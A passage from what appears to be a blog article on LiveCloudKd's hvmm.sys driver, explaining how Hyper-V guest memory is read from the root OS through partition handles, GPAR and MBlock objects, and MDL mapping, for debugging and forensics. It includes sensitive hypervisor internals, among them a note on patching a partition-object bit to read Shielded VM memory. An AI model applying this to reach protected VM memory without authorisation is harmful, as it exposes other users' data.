<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">LiveCloudKd application passes the request to the driver for reading guest OS memory block. The data, required for the request, is packed into the GPA_INFO structure. This structure contains start memory address, number of bytes to read and service information about virtual machine partition (PID vmwp, partition id).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 53px; overflow: hidden; width: 410px;"><img height="53" src="https://lh5.googleusercontent.com/6Xl1-yjSmYxCSyRq0B_Ia4mOHfIlbp6TE2vn5xDzghK__j_AZa4fQogh_i3o6EamYjnABNXGES6f6H8-kMkzY4XF_KiH_ubNkDWkogB6Z0rdinwFkN1iVwq0EAYlSlu50FFh4ms" style="margin-left: 0px; margin-top: 0px;" width="410" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, get partition handle. To do this, just call the nt!ObReferenceObjectByHandle function with the passed descriptor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 71px; overflow: hidden; width: 294px;"><img height="71" src="https://lh5.googleusercontent.com/G9lyw0nU5fYd2vdRzE4mlyaQaw5zrJkkZmpE7cDwG0kwhwH6RVcDUEvUWwwbEkcUZIw8K51YIAIeESWuw9G1jKIFjFIvqmxMD9lIqG5WT0o9IlK0890QGRkUVfc6DhTik2rO4Ew" style="margin-left: 0px; margin-top: 0px;" width="294" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Type of getting object is FILE_OBJECT. To gain access to the body of the descriptor, you must get a pointer to FsContext.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 29px; overflow: hidden; width: 400px;"><img height="29" src="https://lh3.googleusercontent.com/uhdh35IqHUepGjn8MupcSAf7YJOQOeiD8GCzYz5kgXwsz__9E30STj6ceQOcgRifxEJW8UhjMaiduLmFCADre6RVIOmer9cODHLUGs2c2lHriPD_4PYctYx6G582iMjBZ3D-mLg" style="margin-left: 0px; margin-top: 0px;" width="400" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Beginning part of partition handle looks like:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 110px; overflow: hidden; width: 371px;"><img height="110" src="https://lh6.googleusercontent.com/yafgm0tw6wxZ4U-PI5AFa36LJ6EpX6MqsmrlwXtkvnQ6gagduIbiev-8co-bzbPX-EqLsEXc4BuhTMlFZI-lYI5iL_iKhF1atkMCAwjRPYxTevc0JA0yH39PEmtds-FivhfTpOg" style="margin-left: 0px; margin-top: 0px;" width="371" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 256px; overflow: hidden; width: 374px;"><img height="256" src="https://lh5.googleusercontent.com/0ZHNtXomahdGWRJznfypfIsf2S1MLwm-Assr1dTUZJbmLtogrjHJ19eMOkYF7xYPiVT2ET03drp6F6jq1CEBRypyipmneiHBq0fRlFqy_7iBE3TZK1Ob2EB5wrKGysNL8i5BQMk" style="margin-left: 0px; margin-top: 0px;" width="374" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The first 0x278 bytes contain section signature, the name and its identifier. The size of structure is not small (0x3EF0 for Windows Server 2019) and it is different for different operating systems. The exact size of partition handle can be found in vid.sys!VidCreatePartition (by the amount of memory allocated for it). We will not need it in driver.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we get partition handle type (VmType), we can perform one of two procedures for memory blocks reading. There are actually quite a lot of possible VmType values, and moreover, they differ for different versions of operating systems. For example, VmType for Full VM in Windows 10 and Windows Server 2019 have different values. Not all of them have been investigated (especially for operating systems such as Linux, because WinDBG, that launched by LiveCloudKd, doesn’t work with them). But finally partitions of virtual machines were divided into two categories: container’s partitions and Full VM partitions.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hvmm.sys!VidGetFullVmMemoryBlock function at the input receives a section descriptor, a buffer in which to write the received data, the size of the buffer in bytes and the GPA of the virtual machine.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BOOLEAN</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VidGetFullVmMemoryBlock(</span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVM_PROCESS_CONTEXT</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pPartitionHandle</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PCHAR</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pBuffer</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">len</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG64</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPA</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPA – it is page number, which is calculated: GPA = GpaInfo.StartAddress / PAGE_SIZE;</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The start address should be aligned on the page boundary, if the hvmm driver function is called directly (LiveCloudKdSdk prepared usermode buffer for that).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we need to find GPAR object, that describes the requested GPA. Each GPA is included in the memory block, previously allocated by the hypervisor, and this memory block is described by the GPAR object. Fields GpaIndexStart and GpaIndexEnd are located, respectively, at the offsets 0x100 and 0x108 of the GPAR objects. You can understand whether the GPAR object describes the GPA or not, by the value of these fields. For example:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 181px; overflow: hidden; width: 352px;"><img height="181" src="https://lh5.googleusercontent.com/yKf4u3ShsKEMhmV1QudmwQEQFd6R7TaaPTB2Jjlp3eVWyDIC7HQ6SSHowasA8ELKtak31vcKOFqFbwwixI810Cj-K_S2sieLRknSmk5JWkRvEQgTt-UeXVBfsc4V9WmTj6om7DQ" style="margin-left: 0px; margin-top: 0px;" width="352" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This GPAR object control GPA from 0 to 0x8fbff.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPAR objects count in Full VM are much smaller than in containers. For example, Generation 2 Full VM has 3-4 GPAR objects, containers have about 780. Then guest OS has more memory, then more blocks it allocates with HvMapGpaPages* hypercalls and, correspondingly, there are greater numbers of GPAR objects. The maximum range of GPAs, described by GPAR object, that I met, was 0x96000 pages.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's get back to our driver. We can find GPAR object using hvmm.sys!VidGetGparObjectForGpa function. Partition handle and GPA are passed to the function. How does it work? As described above, each partition handle has a pointer to a GPA block descriptor. This is a structure, which, among other things, contains a pointer to the partition handle itself, a pointer to array with pointers to GPAR objects, and the count of elements in the array of GPAR objects (see the diagram of the relationship of structures above).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 70px; overflow: hidden; width: 192px;"><img height="70" src="https://lh5.googleusercontent.com/qZHx9kWi38n8JPq6Sx-FmdG9xBlZCdw1ZGVYqx4TrRgq98k5AyAxpfOBHFnhTqBEyphUTl9dC7VLOKUul09V_9Cj1AvpwyMcIcxrNLHrRxujT9PKy810fyLtFND_gIRCsU7YKUk" style="margin-left: 0px; margin-top: 0px;" width="192" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 155px; overflow: hidden; width: 456px;"><img height="155" src="https://lh3.googleusercontent.com/EcoaQhZZs168nuflM_yzRSpwENC1I6ZmuFIIqLHdn6FrIL6BPvbouSo1LsCoC_R5FoJboAY1bwmOMaYfZMXgamfN-x5qbzgyPaQaJfzkD3i84aqHpmjNjxJ1WJAFBmjezKTfyro" style="margin-left: 0px; margin-top: 0px;" width="456" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 125px; overflow: hidden; width: 397px;"><img height="125" src="https://lh5.googleusercontent.com/7mJ8kiCy66aDDNR6c4cAwCBm4miaN7eZ0vszyVA_P4prDtyxJrcsujnyap1OJlFcmrRz0eBpBXqme48o5XFmuHjwRIdI-NTdAzunBFrFyG9lrztetxp1UwNHHqOrEkiOuUZL9Fk" style="margin-left: 0px; margin-top: 0px;" width="397" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we got this information, we can run cycle through the GPAR objects and find 1 GPAR the object, that is responsible for the GPA. Code is quite simple, as you can see. This is a simplified implementation of VsmmLookupMemoryBlockByHandle function of vid.sys driver.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Vid.sys driver also has additional procedure for encrypted memory reading - VsmmpSecureReadMemoryBlockPageRangeInternal. It uses AES XTS through BCryptEncrypt\BCryptDecrypt functions from ksecdd.sys driver. I can’t find in what cases they are used, because even for Shielded VMs with TPM enabled, memory is not encrypted. Perhaps some special areas are encrypted, but they haven’t been found still. But if you try use vid.dll! VidRead\WriteMemoryBlockPageRange functions vid.sys starts analyze second bit in 0x18 byte of Prtn object (test byte ptr [Prtn_obj+18h], 2), and if that bit is not zero crypto-memory functions will be executed. But for standard OS regions they will return fails. It means, for reading Shielded VM memory using vid.dll functions, Prtn object must be patched (2nd bit in 18h byte must be zeroed). Obviously, guest OS directly make reading/writing operations to the already allocated memory area without calling any functions from vid.sys. All exceptions must be caught and handled by the hypervisor. Accordingly, if the root OS encrypts some parts of the memory, then the guest OS will not be able to transparently access them.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go back to the hvmm code. </span><span style="font-family: calibri, sans-serif; font-size: 9pt; text-indent: 35.4pt;">When we found a suitable GPAR object, we exit from cycle.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 270px; overflow: hidden; width: 329px;"><img height="270" src="https://lh4.googleusercontent.com/EOt-LDyTno_RitMhemmdWc1xQohzcZz5M5cq3WwVy_oGcdc19tt6ynaIB_dVwxpPQiBdXXBw5RiUrVmf6lbnfRgRPibQg10O27NbX84bSzBLaZUPHO7XwuuS-jC1fW0SLtDqgA0" style="margin-left: 0px; margin-top: 0px;" width="329" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are GPAR objects exist, that don’t describe the GPA, but instead of the necessary data, contain a pointer to a certain usermode structure inside the vmwp.exe process. They are tied to the memory allocated for virtual Hyper-V devices. Usually, there is 1 such GPAR object per partition (see content of that memory later in Docker part of that article).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 55px; overflow: hidden; width: 327px;"><img height="55" src="https://lh3.googleusercontent.com/4LvhHmL8SSgW8ks_6WPRZtYXAAobeaKrVpHZbKJdm01VjTeWPij07u_3x_vgtVJiaK6qmAHvqhoB5BbgAwfnpVTdPjYf0TjFQuVi-rnQjrxds0FUSx7-HVsT5WzxvX-xLhnHmFY" style="margin-left: 0px; margin-top: 0px;" width="327" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We don’t need in that objects during memory reading operations.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">What data is contained in the GPAR object and will help to read the data from the guest OS? This is another data type - an MBlock object (MEMORY_BLOCK). It contains guest PFN data and other useful information. A fairly large structure, at the beginning contains the signature "Mb ".</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 107px; overflow: hidden; width: 228px;"><img height="107" src="https://lh3.googleusercontent.com/nTCpo3Z8ipHdoXmNm7fx2T-F2UYer11iv0XZrLiJj-g7Vim9hnOefYosgOOvn0zE1_qTa2la83mA8HNH9lzoBDotoK0kfiTVjp_8NSv0-ymxXipiWTSBoNi27LAdQI9KUI5V_u4" style="margin-left: 0px; margin-top: 0px;" width="228" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From all the fields, we need only a pointer to the GPA array. Size of the array element is 16 bytes. One 8-byte part contains the GPA (in guest OS), and other 8-byte part contains the SPA information (in root OS).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 89px; overflow: hidden; width: 246px;"><img height="89" src="https://lh5.googleusercontent.com/bAOpdK7V4R-93oEjqAqqm3LUGKp6NXpe0d5eEudjSz4vxVjjq2a0JEyDFrF8g-8N0DX9i8SfDrdxb5gRnd9BC1PyN-L0PAhcVYw7hZCoKFa3h7WQIBfrXf1yAKnYRIwc_LFDEVg" style="margin-left: 0px; margin-top: 0px;" width="246" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can calculate SPA by following formula:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 35px; overflow: hidden; width: 389px;"><img height="35" src="https://lh6.googleusercontent.com/9obLIpB_h5cngfxiMC9zJpC_rL-qjB6H2P2XVV5Ux_REeXYYxifh7SkhBFXj-25lpXY03n6iIZ0PtNXhLQKkhHuKWAPUJoueFAU3X3lPdGxViIsi29FQGLWVx8u1bPmeft14PG0" style="margin-left: 0px; margin-top: 0px;" width="389" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For SPA reading, we need mapped it to root OS virtual address space. Use MDL structure for this:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 24px; overflow: hidden; width: 329px;"><img height="24" src="https://lh5.googleusercontent.com/fJfmaM9z2WTFjlJPqHR1NM4uzTdXqa5t90LOg5lYLNcVO6-MDADqHXTjG3ou7SsGmjSnK5z4I1i0KorATsbcQsPMiAp9P_Mt8F734WnXrtvhyvfr5BNsu5PEIL9tkM5J7TkDLC4" style="margin-left: 0px; margin-top: 0px;" width="329" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is an array of PFN at the end of each MDL structure. A pointer to it can be obtained using MmGetMdlPfnArray macro. When we received the pointer, we had wrote HostSPA index to it. Of course, it is possible to put in MDL more than one PFN at one time. But there is a chance to get to the border of GPAR blocks, therefore memory reading is done page by page. For Full VM, this is not very profitable, since the size of each block is large enough, but speed is still good.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 199px; overflow: hidden; width: 409px;"><img height="199" src="https://lh4.googleusercontent.com/1hUAVBCFV4amLBuiM28NsmEaeUr1hRN6e1LDWRsdpkHxx1XiKaLPHWvrDqrhNPx1ne68S5FD0ezGE1t4J64RWZDURZ9Bpwjwp9z7sZwBpWF1agQGRpI0hxwjU30kCRT3WgwJL3s" style="margin-left: 0px; margin-top: 0px;" width="409" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we get virtual address using the nt!MmMapLockedPagesSpecifyCache function and use it to copy guest OS memory block using nt!RtlCopyMemory. Accordingly, reading is performed in a loop. 1 memory page is copied on 1 iteration. During copying, it is recommended to pause the virtual machine in order to avoid memory modification during reading. In LiveCloudKdSdk, the SdkControlVmState function is implemented for this. It suspends the execution of the virtual machine either by the usual powershell-cmdlets Suspend-VM\Resume-VM, or works with the special register of each virtual processor calling HvWriteVpRegister hypercall and set the HvRegisterExplicitSuspend register to 0 (resume) or 1 (suspend).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Container memory reading</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Consider reading the container’s memory on Windows Defender Application Guard example (to use it, it’s need install same name component in Windows 10. It has been present since the 1803 build). Access to memory of Windows Sandbox and docker container in Hyper-V isolation mode is same.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
